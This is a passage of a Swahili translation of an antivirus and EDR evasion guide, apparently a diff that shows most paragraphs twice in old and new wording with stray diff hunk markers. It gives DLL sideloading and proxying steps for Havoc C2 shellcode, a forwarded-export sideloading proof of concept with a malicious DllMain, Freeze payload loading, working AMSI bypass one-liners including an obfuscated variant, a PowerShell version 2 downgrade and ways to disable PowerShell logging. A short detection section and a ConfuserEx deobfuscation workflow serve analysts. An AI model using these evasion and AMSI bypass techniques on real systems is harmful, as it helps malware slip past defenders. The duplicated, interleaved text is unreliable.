> Unapobadilisha payloads zako kwa ajili ya evasion, hakikisha **uzima automatic sample submission** katika defender, na tafadhali, kwa uzito, **DO NOT UPLOAD TO VIRUSTOTAL** ikiwa lengo lako ni kupata evasion kwa muda mrefu. Ikiwa unataka kukagua kama payload yako inagundulika na AV fulani, iweke kwenye VM, jaribu kuzima automatic sample submission, na iteste huko hadi utakapokuwa una kuridhika na matokeo.
## EXEs vs DLLs
Iwapo inawezekana, daima precedence kutumia DLLs kwa ajili ya evasion; kwa uzoefu wangu, DLL files kwa kawaida huishikiwa na kugunduliwa kidogo sana, hivyo ni mbinu rahisi sana ya kuepuka utambuzi katika baadhi ya kesi (kama payload yako ina njia ya kukimbia kama DLL bila shaka).
Pale panapowezekana, daima **peana kipaumbele kwa kutumia DLLs kwa evasion**, kwa uzoefu wangu, faili za DLL kwa kawaida huwa **zinagundulika kidogo zaidi** na kuchambuliwa kidogo, kwa hivyo ni mbinu rahisi kutumia kuepuka utambuzi katika baadhi ya kesi (ikiwa payload yako ina njia ya kuendeshwa kama DLL bila shaka).
Kama tunaweza kuona katika picha hii, DLL Payload kutoka Havoc ina detection rate ya 4/26 kwenye antiscan.me, wakati EXE payload ina detection rate ya 7/26.
Kama tunaona kwenye picha hii, DLL Payload kutoka Havoc ina detection rate ya 4/26 kwenye antiscan.me, wakati EXE payload ina detection rate ya 7/26.
<figure><img src="../images/image (1130).png" alt=""><figcaption><p>antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL</p></figcaption></figure>
<figure><img src="../images/image (1130).png" alt=""><figcaption><p>mfanano wa antiscan.me wa Havoc EXE payload ya kawaida dhidi ya Havoc DLL ya kawaida</p></figcaption></figure>
Sasa tutaonyesha tricks unaweza kutumia na DLL files ili kuwa na ujasiri zaidi.
Sasa tutaonyesha baadhi ya mbinu unaweza kutumia na faili za DLL ili kuwa stealth zaidi.
## DLL Sideloading & Proxying
**DLL Sideloading** inatumia faida ya DLL search order inayotumika na loader kwa kuweka victim application na malicious payload(s) karibu pamoja.
**DLL Sideloading** inatumia mpangilio wa utafutaji wa DLL unaotumika na loader kwa kuweka programu ya mwathiriwa na malicious payload(s) kando kwa kando.
Unaweza kuangalia programu zinazoweza kuathiriwa na DLL Sideloading kwa kutumia [Siofra](https://github.com/Cybereason/siofra) na powershell script ifuatayo:
Unaweza kukagua programu zinazoweza kuathiriwa na DLL Sideloading ukitumia [Siofra](https://github.com/Cybereason/siofra) na powershell script ifuatayo:
```bash
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
```
This command will output the list of programs susceptible to DLL hijacking inside "C:\Program Files\\" and the DLL files they try to load.
Amri hii itaonyesha orodha ya programu zinazoweza kuathiriwa na DLL hijacking ndani ya "C:\Program Files\\" na faili za DLL ambazo zinajaribu kupakia.
Ninapendekeza sana **uchunguze mwenyewe programu za DLL Hijackable/Sideloadable**, mbinu hii ni ya kimya sana inapofanywa ipasavyo, lakini ikiwa utatumia programu za DLL Sideloadable zinazojulikana kwa umma, unaweza kukamatwa kwa urahisi.
Ninapendekeza kwa nguvu **explore DLL Hijackable/Sideloadable programs yourself**, mbinu hii ni ya kimyakimya ikiwa itafanywa vizuri, lakini ukitumia programu za DLL Sideloadable zinazojulikana hadharani, unaweza kukamatwa kwa urahisi.
Kuweka tu malicious DLL yenye jina ambalo programu inatarajia kupakia haitapakia payload yako, kwa sababu programu inatarajia kazi maalum ndani ya DLL hiyo; ili kurekebisha tatizo hili, tutatumia mbinu nyingine iitwayo **DLL Proxying/Forwarding**.
Kuweka tu DLL mbaya yenye jina ambalo programu inatarajia kupakia haitapakia payload yako, kwa sababu programu inatarajia functions maalum ndani ya DLL hiyo; ili kurekebisha tatizo hili, tutatumia mbinu nyingine inayoitwa **DLL Proxying/Forwarding**.
**DLL Proxying** inapitisha miito ambayo programu inafanya kutoka kwa proxy (na malicious) DLL kwenda DLL ya asili, hivyo ikihifadhi utendaji wa programu na kuwa na uwezo wa kushughulikia utekelezaji wa payload yako.
**DLL Proxying** inapitisha miito ambazo programu inazofanya kutoka kwenye proxy (na DLL hatari) kwenda kwa DLL ya asili, hivyo kudumisha utendakazi wa programu na kuwezesha kushughulikia utekelezaji wa payload yako.
Nitatumia mradi [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) kutoka kwa [@flangvik](https://twitter.com/Flangvik/)
Nitakuwa nikitumia mradi wa [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) kutoka kwa [@flangvik](https://twitter.com/Flangvik/)
Hizi ndizo hatua nilizofuata:
Haya ni hatua niliofuata:
```
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
```
Amri ya mwisho itatupatia faili 2: kiolezo cha chanzo cha DLL, na DLL ya asili iliyobadilishwa jina.
Amri ya mwisho itatupa mafaili 2: DLL source code template, na DLL ya asili iliyobadilishwa jina.
<figure><img src="../images/sharpdllproxy.gif" alt=""><figcaption></figcaption></figure>
```
@ -106,38 +106,38 @@ Amri ya mwisho itatupatia faili 2: kiolezo cha chanzo cha DLL, na DLL ya asili i
```
<figure><img src="../images/dll_sideloading_demo.gif" alt=""><figcaption></figcaption></figure>
Both our shellcode (encoded with [SGN](https://github.com/EgeBalci/sgn)) and the proxy DLL have a 0/26 Detection rate in [antiscan.me](https://antiscan.me)! I would call that a success.
Zote shellcode yetu (encoded with [SGN](https://github.com/EgeBalci/sgn)) na proxy DLL zina kiwango cha utambuzi cha 0/26 kwenye [antiscan.me](https://antiscan.me)! Ningesema hiyo ni mafanikio.
<figure><img src="../images/image (193).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Ninapendekeza sana utakapoangalia [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) kuhusu DLL Sideloading na pia [ippsec's video](https://www.youtube.com/watch?v=3eROsG_WNpE) ili kujifunza zaidi kuhusu tuliyojadili kwa kina.
> Ninapendekeza sana uangalie [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) kuhusu DLL Sideloading na pia [ippsec's video](https://www.youtube.com/watch?v=3eROsG_WNpE) ili ujifunze zaidi kuhusu tuliyojadili kwa undani.
### Kutumia Forwarded Exports (ForwardSideLoading)
### Kutumia Vibaya Forwarded Exports (ForwardSideLoading)
Windows PE modules can export functions that are actually "forwarders": instead of pointing to code, the export entry contains an ASCII string of the form `TargetDll.TargetFunc`. When a caller resolves the export, the Windows loader will:
Windows PE modules zinaweza ku-export functions ambazo kwa kweli ni "forwarders": badala ya kuashiria code, entry ya export ina string ya ASCII ya muundo `TargetDll.TargetFunc`. Wakati mtumiaji anapotatua export, Windows loader itafanya:
- Ipakue `TargetDll` ikiwa bado haijaload
- Tafuta `TargetFunc` kutoka kwake
- Itapakia `TargetDll` ikiwa haijapakiwa
- Itatafuta `TargetFunc` kutoka kwake
Key behaviors to understand:
- If `TargetDll` is a KnownDLL, it is supplied from the protected KnownDLLs namespace (e.g., ntdll, kernelbase, ole32).
- If `TargetDll` is not a KnownDLL, the normal DLL search order is used, which includes the directory of the module that is doing the forward resolution.
Mambo muhimu ya kuelewa:
- Ikiwa `TargetDll` ni KnownDLL, hutolewa kutoka kwa namespace lililolindwa la KnownDLLs (mfano, ntdll, kernelbase, ole32).
- Ikiwa `TargetDll` sio KnownDLL, utaratibu wa kawaida wa utafutaji wa DLL unatumika, ambao unajumuisha directory ya module inayofanya utatuzi wa forward.
This enables an indirect sideloading primitive: find a signed DLL that exports a function forwarded to a non-KnownDLL module name, then co-locate that signed DLL with an attacker-controlled DLL named exactly as the forwarded target module. When the forwarded export is invoked, the loader resolves the forward and loads your DLL from the same directory, executing your DllMain.
Hii inaruhusu primitive isiyo ya moja kwa moja ya sideloading: tafuta DLL iliyosainiwa inayotoa function iliyoforward kwenda jina la module lisilo la KnownDLL, kisha weka pamoja DLL hiyo iliyosainiwa na DLL inayodhibitiwa na mshambuliaji iliyoitwa hasa kwa jina kama module lengwa iliyo forwarded. Wakati forwarded export itakapoitwa, loader itatatua forward na kupakia DLL yako kutoka directory ile ile, ikitekeleza DllMain yako.
Example observed on Windows 11:
Mfano ulionekana kwenye Windows 11:
```
keyiso.dll KeyIsoSetAuditingInterface -> NCRYPTPROV.SetAuditingInterface
```
`NCRYPTPROV.dll` si KnownDLL, hivyo inatatuliwa kupitia mpangilio wa kawaida wa utafutaji.
`NCRYPTPROV.dll` si KnownDLL, hivyo inatatuliwa kupitia mpangilio wa utafutaji wa kawaida.
PoC (kunakili na kubandika):
1) Nakili DLL ya mfumo iliyosainiwa kwenye folda inayoweza kuandikwa
PoC (copy-paste):
1) Nakili system DLL iliyosainiwa kwenye folda inayoweza kuandikwa
```
copy C:\Windows\System32\keyiso.dll C:\test\
```
2) Weka `NCRYPTPROV.dll` yenye madhara katika folda hiyo hiyo. DllMain ndogo ya msingi inatosha kupata utekelezaji wa msimbo; huna haja ya kutekeleza forwarded function ili kusababisha DllMain.
2) Weka `NCRYPTPROV.dll` yenye madhara katika folda ile ile. DllMain ndogo kabisa inatosha kupata utekelezaji wa msimbo; huna haja ya kutekeleza forwarded function ili kusababisha DllMain.
```c
// x64: x86_64-w64-mingw32-gcc -shared -o NCRYPTPROV.dll ncryptprov.c
#include <windows.h>
@ -153,31 +153,31 @@ return TRUE;
```
rundll32.exe C:\test\keyiso.dll, KeyIsoSetAuditingInterface
```
Observed behavior:
- rundll32 (imesainiwa) inapakia side-by-side `keyiso.dll` (imesainiwa)
- Wakati ikitatua `KeyIsoSetAuditingInterface`, loader inafuata forward hadi `NCRYPTPROV.SetAuditingInterface`
- Kisha loader inapakia `NCRYPTPROV.dll` kutoka `C:\test` na inatekeleza `DllMain` yake
- Ikiwa `SetAuditingInterface` haijatimizwa, utapata kosa la "missing API" tu baada ya `DllMain` tayari kukimbia
Tabia zilizoshuhudiwa:
- rundll32 (signed) inapakia side-by-side `keyiso.dll` (signed)
- Wakati wa kutatua `KeyIsoSetAuditingInterface`, loader inafuata forward hadi `NCRYPTPROV.SetAuditingInterface`
- Kisha loader inapakia `NCRYPTPROV.dll` kutoka `C:\test` na inaiendesha `DllMain` yake
- Ikiwa `SetAuditingInterface` haijatimizwa, utapata kosa la "missing API" tu baada ya `DllMain` tayari kuendesha
Hunting tips:
- Zingatia forwarded exports ambapo moduli lengwa si KnownDLL. KnownDLLs zimeorodheshwa chini ya `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`.
Vidokezo vya ufuatiliaji:
- Zingatia forwarded exports ambapo module lengwa si KnownDLL. KnownDLLs zimeorodheshwa chini ya `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`.
- Unaweza kuorodhesha forwarded exports kwa zana kama:
```
dumpbin /exports C:\Windows\System32\keyiso.dll
# forwarders appear with a forwarder string e.g., NCRYPTPROV.SetAuditingInterface
```
- Tazama inventory ya forwarder ya Windows 11 ili kutafuta wagombea: https://hexacorn.com/d/apis_fwd.txt
- Tazama orodha ya forwarder ya Windows 11 kutafuta wagombea: https://hexacorn.com/d/apis_fwd.txt
Detection/defense ideas:
- Fuatilia LOLBins (kwa mfano, rundll32.exe) zinazopakia signed DLLs kutoka non-system paths, na kisha zinapakia non-KnownDLLs zenye base name sawa kutoka kwenye directory hiyo
- Toa onyo kuhusu mnyororo wa process/module kama: `rundll32.exe` → non-system `keyiso.dll``NCRYPTPROV.dll` chini ya user-writable paths
- Tekeleza sera za code integrity (WDAC/AppLocker) na kataa write+execute katika application directories
Mapendekezo ya utambuzi/utetezi:
- Monitor LOLBins (e.g., `rundll32.exe`) loading signed DLLs from non-system paths, followed by loading non-KnownDLLs with the same base name from that directory
- Toa tahadhari juu ya mnyororo wa mchakato/moduli kama: `rundll32.exe` → non-system `keyiso.dll``NCRYPTPROV.dll` chini ya njia zinazoweza kuandikwa na mtumiaji
- Tekeleza sera za uadilifu wa msimbo (WDAC/AppLocker) na zuia write+execute katika saraka za programu
## [**Freeze**](https://github.com/optiv/Freeze)
`Freeze ni payload toolkit ya ku-bypass EDRs kwa kutumia suspended processes, direct syscalls, na alternative execution methods`
`Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods`
Unaweza kutumia Freeze kupakia na kutekeleza shellcode yako kwa njia fiche.
Unaweza kutumia Freeze kupakia na kutekeleza shellcode yako kwa njia iliyofichwa.
```
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
@ -187,51 +187,51 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
<figure><img src="../images/freeze_demo_hacktricks.gif" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Kukwepa kugunduliwa ni mchezo wa paka na panya; kile kinachofanya kazi leo kinaweza kugunduliwa kesho, kwa hivyo usitegemee zana moja tu — iwezekanavyo jaribu kuunganisha mbinu kadhaa za kukwepa.
> Kuepuka kugunduliwa ni mchezo wa paka na panya; kile kinachofanya kazi leo kinaweza kugunduliwa kesho, kwa hivyo usitegemee chombo kimoja tu — inapowezekana, jaribu kuunganisha mbinu mbalimbali za kuepuka.
## AMSI (Anti-Malware Scan Interface)
AMSI ilianzishwa ili kuzuia "[fileless malware](https://en.wikipedia.org/wiki/Fileless_malware)". Mwanzoni, AVs ziliweza tu kuchambua **files on disk**, hivyo kama ungeweza kutekeleza payloads **in-memory**, AV haingeweza kufanya chochote kuzuia, kwa kuwa haikuwa na mwonekano wa kutosha.
AMSI ilianzishwa kuzuia "[fileless malware](https://en.wikipedia.org/wiki/Fileless_malware)". Mwanzo, AV zilikuwa zinaweza tu kupima **files on disk**, hivyo ikiwa ungeweza kwa namna fulani kutekeleza payloads **directly in-memory**, AV haingekuwa na uwezo wa kufanya chochote kuzuia hilo kwa sababu haikuwa na mwonekano wa kutosha.
The AMSI feature is integrated into these components of Windows.
Kipengele cha AMSI kimeingizwa katika sehemu hizi za Windows.
- User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation)
- PowerShell (scripts, interactive use, and dynamic code evaluation)
- Windows Script Host (wscript.exe and cscript.exe)
- JavaScript and VBScript
- User Account Control, au UAC (kupandishwa cheo kwa EXE, COM, MSI, au ufungaji wa ActiveX)
- PowerShell (scripts, matumizi ya mwingiliano, na tathmini ya msimbo wakati wa utekelezaji)
- Windows Script Host (wscript.exe na cscript.exe)
- JavaScript na VBScript
- Office VBA macros
Inaruhusu suluhisho za antivirus kuchunguza tabia za scripts kwa kufunua yaliyomo kwenye script kwa njia ambayo hayajakifichwa na hayajaundwa kwa obfuscation.
Inaruhusu suluhisho za antivirus kuchunguza tabia za script kwa kuonyesha yaliyomo kwenye script katika muundo usiosimbwa na usiofichwa.
Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.
Kukimbia `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` kutaonyesha onyo lifuatalo kwenye Windows Defender.
<figure><img src="../images/image (1135).png" alt=""><figcaption></figcaption></figure>
Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
Angalia jinsi inavyoandika awali `amsi:` kisha njia ya executable kutoka ambapo script ilikimbizwa; katika kesi hii, powershell.exe
Hatujaweka faili lolote kwenye diski, lakini bado tulikamatwa while executing in-memory kwa sababu ya AMSI.
Hatukuweka faili lolote kwenye disk, lakini bado tuligunduliwa in-memory kwa sababu ya AMSI.
Moreover, starting with **.NET 4.8**, C# code is run through AMSI as well. This even affects `Assembly.Load(byte[])` to load in-memory execution. Thats why using lower versions of .NET (like 4.7.2 or below) is recommended for in-memory execution if you want to evade AMSI.
Zaidi ya hayo, kuanzia na **.NET 4.8**, msimbo wa C# unapitishwa kupitia AMSI pia. Hii hata inaathiri `Assembly.Load(byte[])` kwa ajili ya load in-memory execution. Ndiyo sababu inashauriwa kutumia matoleo ya chini ya .NET (kama 4.7.2 au chini) kwa in-memory execution ikiwa unataka kuepuka AMSI.
Kuna njia chache za kuzidi AMSI:
Kuna njia chache za kuepuka AMSI:
- **Obfuscation**
Kwa kuwa AMSI kwa kiasi kikubwa inategemea detections za static, hivyo, kubadilisha scripts unazojaribu kuziweka inaweza kuwa njia nzuri ya kukwepa ugundaji.
Kwa kuwa AMSI hasa hufanya kazi kwa kugundua kwa njia za static, hivyo kubadilisha scripts unazojaribu kuziyasha inaweza kuwa njia nzuri ya kuepuka utambuzi.
Hata hivyo, AMSI ina uwezo wa kuondoa obfuscation hata kama ina tabaka kadhaa, hivyo obfuscation inaweza isiwe chaguo zuri kulingana na jinsi inavyofanywa. Hii inafanya isiwe rahisi kukwepa. Ingawa, wakati mwingine, yote unayohitaji ni kubadilisha baadhi ya majina ya variable na utakuwa sawa, hivyo inategemea kiasi ambacho kitu kimekuwa kimeorodheshwa.
Hata hivyo, AMSI ina uwezo wa kuondoa obfuscation hata kama kuna tabaka kadhaa, kwa hivyo obfuscation inaweza isiwe chaguo zuri kulingana na jinsi inavyofanywa. Hii inafanya isiwe rahisi kuepuka. Ingawa, wakati mwingine, yote unayohitaji ni kubadilisha majina ya vigezo vichache na utakuwa sawa, hivyo inategemea ni kiasi gani kitu kimepigwa alama.
- **AMSI Bypass**
Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe, wscript.exe, etc.) process, it's possible to tamper with it easily even running as an unprivileged user. Due to this flaw in the implementation of AMSI, researchers have found multiple ways to evade AMSI scanning.
Kwa kuwa AMSI inatekelezwa kwa kuingiza DLL ndani ya mchakato wa powershell (pia cscript.exe, wscript.exe, n.k.), inawezekana kuiharibu kwa urahisi hata ukiendesha kama mtumiaji asiye na ruhusa za juu. Kutokana na kasoro hii katika utekelezaji wa AMSI, watafiti wamegundua njia nyingi za kuepuka skanning ya AMSI.
**Forcing an Error**
Kusababisha AMSI initialization kushindwa (amsiInitFailed) kutasababisha hakuna scan itakayozinduliwa kwa process ya sasa. Huu ulifichuliwa awali na [Matt Graeber](https://twitter.com/mattifestation) na Microsoft imeunda signature ili kuzuia matumizi mapana.
Kulazimisha uanzishaji wa AMSI kushindwa (amsiInitFailed) kutasababisha hakutakuwa na skani itakayoznizwa kwa mchakato wa sasa. Hii awali ilifichuliwa na [Matt Graeber](https://twitter.com/mattifestation) na Microsoft imeunda signature ili kuzuia matumizi ya upana.
```bash
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
Ilichukua tu mstari mmoja wa powershell code ili kufanya AMSI isitumike kwa mchakato wa powershell wa sasa. Laini hii bila shaka imetambuliwa na AMSI yenyewe, hivyo inahitajika marekebisho ili kutumia mbinu hii.
Kilichohitajika ni mstari mmoja tu wa msimbo wa powershell kufanya AMSI isitumike kwa mchakato wa powershell wa sasa. Mstari huu bila shaka umetambuliwa na AMSI yenyewe, hivyo mabadiliko yanahitajika ili kutumia mbinu hii.
Hapa kuna AMSI bypass iliyorekebishwa niliyopata kutoka kwenye [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
```bash
@ -247,77 +247,78 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
Kumbuka, kuna uwezekano hili litachukuliwa kama hatari mara chapisho hili litakapotoka, hivyo usichapishe code ikiwa mpango wako ni kubaki bila kugunduliwa.
Kumbuka, hii huenda itachomwa alama mara tu chapisho hili linapotoka, kwa hivyo haupaswi kuchapisha code yoyote ikiwa mpango wako ni kubaki bila kugunduliwa.
**Memory Patching**
Mbinu hii iligunduliwa mwanzoni na [@RastaMouse](https://twitter.com/_RastaMouse/) na inahusisha kupata anuani ya kazi ya "AmsiScanBuffer" katika amsi.dll (inyenye inawajibika kukagua data iliyotolewa na mtumiaji) na kuiandika juu kwa maagizo yanayorejesha nambari ya E_INVALIDARG; kwa njia hii, matokeo ya uchunguzi yenyewe yatarudisha 0, ambayo huchukuliwa kama matokeo safi.
This technique was initially discovered by [@RastaMouse](https://twitter.com/_RastaMouse/) and it involves finding address for the "AmsiScanBuffer" function in amsi.dll (responsible for scanning the user-supplied input) and overwriting it with instructions to return the code for E_INVALIDARG, this way, the result of the actual scan will return 0, which is interpreted as a clean result.
> [!TIP]
> Tafadhali soma [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) kwa maelezo zaidi.
> Tafadhali soma [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) kwa maelezo ya kina.
Kuna mbinu nyingi nyingine zinazotumiwa kupita AMSI kwa powershell, angalia [**ukurasa huu**](basic-powershell-for-pentesters/index.html#amsi-bypass) na [**repo hii**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) ili ujifunze zaidi kuhusu hizo.
Kuna pia mbinu nyingi nyingine zinazotumika bypass AMSI kwa powershell; angalia [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) na [**this repo**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) ili kujifunza zaidi kuhusu hizo.
Chombo hiki [**https://github.com/Flangvik/AMSI.fail**](https://github.com/Flangvik/AMSI.fail) pia hutoa script za kupita AMSI.
Chombo hiki [**https://github.com/Flangvik/AMSI.fail**](https://github.com/Flangvik/AMSI.fail) pia hutoa script za bypass AMSI.
**Ondoa saini iliyotambuliwa**
**Ondoa saini iliyogunduliwa**
Unaweza kutumia zana kama **[https://github.com/cobbr/PSAmsi](https://github.com/cobbr/PSAmsi)** na **[https://github.com/RythmStick/AMSITrigger](https://github.com/RythmStick/AMSITrigger)** kuondoa saini ya AMSI iliyotambuliwa kutoka kwenye memory ya process ya sasa. Zana hii inafanya kazi kwa kuchunguza memory ya process ya sasa kwa ajili ya saini ya AMSI kisha kuibandika tena kwa maagizo ya NOP, kwa ufanisi kuiondoa kwenye memory.
Unaweza kutumia chombo kama **[https://github.com/cobbr/PSAmsi](https://github.com/cobbr/PSAmsi)** na **[https://github.com/RythmStick/AMSITrigger](https://github.com/RythmStick/AMSITrigger)** kuondoa saini ya AMSI iliyogunduliwa kutoka kwa kumbukumbu ya mchakato wa sasa. Chombo hiki kinafanya kazi kwa kuchambua kumbukumbu ya mchakato wa sasa kwa ajili ya saini ya AMSI kisha kuandika juu yake kwa NOP instructions, vipi kuiondoa kabisa kutoka kwa kumbukumbu.
**Bidhaa za AV/EDR zinazotumia AMSI**
Unaweza kupata orodha ya bidhaa za AV/EDR zinazotumia AMSI katika **[https://github.com/subat0mik/whoamsi](https://github.com/subat0mik/whoamsi)**.
**Tumia PowerShell version 2**
Ikiwa unatumia PowerShell version 2, AMSI haitapakiwa, hivyo unaweza kuendesha scripts zako bila kukaguliwa na AMSI. Unaweza kufanya hivi:
**Tumia Powershell version 2**
Ikiwa utatumia PowerShell version 2, AMSI haitapakiwa, kwa hivyo unaweza kuendesha script zako bila kuchunguzwa na AMSI. Unaweza kufanya hivi:
```bash
powershell.exe -version 2
```
## PS Logging
PowerShell logging ni sifa inayokuwezesha kurekodi amri zote za PowerShell zinazotekelezwa kwenye mfumo. Hii inaweza kuwa ya msaada kwa auditing na troubleshooting, lakini pia inaweza kuwa **tatizo kwa wanavurugu wanaotaka kuepuka kugunduliwa**.
PowerShell logging ni kipengele kinachokuwezesha kurekodi amri zote za PowerShell zinazotekelezwa kwenye mfumo. Hii inaweza kuwa muhimu kwa madhumuni ya ukaguzi na utatuzi wa matatizo, lakini pia inaweza kuwa **tatizo kwa wadukuzi wanaotaka kuepuka kugunduliwa**.
To bypass PowerShell logging, unaweza kutumia mbinu zifuatazo:
To bypass PowerShell logging, you can use the following techniques:
- **Disable PowerShell Transcription and Module Logging**: Unaweza kutumia zana kama [https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs](https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs) kwa kusudi hili.
- **Disable PowerShell Transcription and Module Logging**: Unaweza kutumia zana kama [https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs](https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs) kwa madhumuni haya.
- **Use Powershell version 2**: Ikiwa utatumia PowerShell version 2, AMSI haitapakiwa, hivyo unaweza kuendesha scripts zako bila kukaguliwa na AMSI. Unaweza kufanya hivi: `powershell.exe -version 2`
- **Use an Unmanaged Powershell Session**: Tumia [https://github.com/leechristensen/UnmanagedPowerShell](https://github.com/leechristensen/UnmanagedPowerShell) kuanzisha powershell bila defenses (hili ndilo `powerpick` kutoka Cobal Strike linavyotumia).
- **Use an Unmanaged Powershell Session**: Tumia [https://github.com/leechristensen/UnmanagedPowerShell](https://github.com/leechristensen/UnmanagedPowerShell) kuanzisha powershell bila ulinzi (hii ndicho `powerpick` kutoka Cobal Strike hutumia).
## Obfuscation
> [!TIP]
> Mbinu kadhaa za obfuscation zinategemea encrypting data, ambayo itaongeza entropia ya binary na kufanya AVs na EDRs ziwe rahisi kugundua. Kuwa mwangalifu na hili na pengine tumia encryption tu kwa sehemu maalum za code yako ambazo ni nyeti au zinazohitaji kufichwa.
> Mbinu kadhaa za obfuscation zinategemea encryption ya data, ambayo itaongeza entropy ya binary na kufanya kuwa rahisi kwa AVs na EDRs kuigundua. Kuwa mwangalifu na hili na labda tumia encryption tu kwenye sehemu maalum za msimbo wako ambazo ni nyeti au zinahitaji kufichwa.
### Deobfuscating ConfuserEx-Protected .NET Binaries
Wakati wa kuchambua malware inayotumia ConfuserEx 2 (au forks za kibiashara) mara nyingi utakutana na ngazi kadhaa za ulinzi zitakazowazuia decompilers na sandboxes. Workflow hapa chini inarejesha kwa uaminifu **nearoriginal IL** ambayo baadaye inaweza ku-decompile hadi C# kwa kutumia zana kama dnSpy au ILSpy.
Wakati unapoichambua malware inayotumia ConfuserEx 2 (au commercial forks), ni kawaida kukutana na tabaka kadhaa za ulinzi zitakazozuia decompilers na sandboxes. Mtiririko wa kazi uliopo hapa chini unaweza kwa uhakika **kurejesha IL inayokaribiana na asili** ambayo baadaye inaweza ku-decompile kuwa C# katika zana kama dnSpy au ILSpy.
1. Anti-tampering removal ConfuserEx encrypts every *method body* and decrypts it inside the *module* static constructor (`<Module>.cctor`). Hii pia inapatch checksum ya PE hivyo mabadiliko yoyote yatasababisha binary ifuate crash. Tumia **AntiTamperKiller** kutafuta encrypted metadata tables, kurecover XOR keys na kuandika assembly safi:
1. Anti-tampering removal ConfuserEx encrypts every *method body* and decrypts it inside the *module* static constructor (`<Module>.cctor`). Hii pia inabadilisha PE checksum hivyo mabadiliko yoyote yatayafanya binary ifanyike crash. Tumia **AntiTamperKiller** kutafuta encrypted metadata tables, kupona XOR keys na kuandika upya assembly safi:
```bash
# https://github.com/wwh1004/AntiTamperKiller
python AntiTamperKiller.py Confused.exe Confused.clean.exe
```
Output ina parameters 6 za anti-tamper (`key0-key3`, `nameHash`, `internKey`) ambazo zinaweza kuwa muhimu wakati ukijenga unpacker yako mwenyewe.
Output inajumuisha vigezo 6 vya anti-tamper (`key0-key3`, `nameHash`, `internKey`) ambavyo vinaweza kuwa muhimu wakati wa kujenga unpacker yako mwenyewe.
2. Symbol / control-flow recovery peana faili *clean* kwa **de4dot-cex** (fork ya de4dot yenye uelewa wa ConfuserEx).
2. Symbol / control-flow recovery ingiza faili *clean* kwa **de4dot-cex** (a ConfuserEx-aware fork of de4dot).
```bash
de4dot-cex -p crx Confused.clean.exe -o Confused.de4dot.exe
```
Flags:
`-p crx` chagua ConfuserEx 2 profile
• de4dot itaondoa control-flow flattening, kurejesha namespaces za asili, classes na majina ya variables na ku-decrypt constant strings.
`-p crx` chagua profile ya ConfuserEx 2
• de4dot itafuta control-flow flattening, kurejesha namespaces, classes na majina ya variables za awali na ku-decrypt constant strings.
3. Proxy-call stripping ConfuserEx inabadilisha method calls za moja kwa moja kuwa wrappers nyepesi (a.k.a *proxy calls*) ili kuvunja further decompilation. Ondoa hizo kwa **ProxyCall-Remover**:
3. Proxy-call stripping ConfuserEx replaces direct method calls with lightweight wrappers (a.k.a *proxy calls*) to further break decompilation. Zitoa kwa kutumia **ProxyCall-Remover**:
```bash
ProxyCall-Remover.exe Confused.de4dot.exe Confused.fixed.exe
```
Baada ya hatua hii unapaswa kuona kawaida .NET API kama `Convert.FromBase64String` au `AES.Create()` badala ya wrapper functions za giza (`Class8.smethod_10`, …).
After this step you should observe normal .NET API such as `Convert.FromBase64String` or `AES.Create()` instead of opaque wrapper functions (`Class8.smethod_10`, …).
4. Manual clean-up endesha binary iliyopatikana chini ya dnSpy, tafuta Base64 blobs kubwa au matumizi ya `RijndaelManaged`/`TripleDESCryptoServiceProvider` ili kupata payload ya *kweli*. Mara nyingi malware huihifadhi kama TLV-encoded byte array iliyowekwa ndani ya `<Module>.byte_0`.
4. Manual clean-up endesha binary iliyotokana chini ya dnSpy, tafuta Base64 blobs kubwa au `RijndaelManaged`/`TripleDESCryptoServiceProvider` matumizi ili kutambua payload ya *kweli*. Mara nyingi malware huihifadhi kama TLV-encoded byte array iliyowekwa ndani ya `<Module>.byte_0`.
